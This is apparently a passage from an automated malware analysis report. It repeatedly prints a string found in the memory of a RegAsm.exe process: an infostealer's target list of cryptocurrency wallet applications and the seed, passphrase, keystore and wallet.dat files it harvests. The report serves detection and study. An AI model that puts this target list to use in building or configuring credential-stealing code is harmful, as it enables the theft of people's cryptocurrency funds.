(Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local 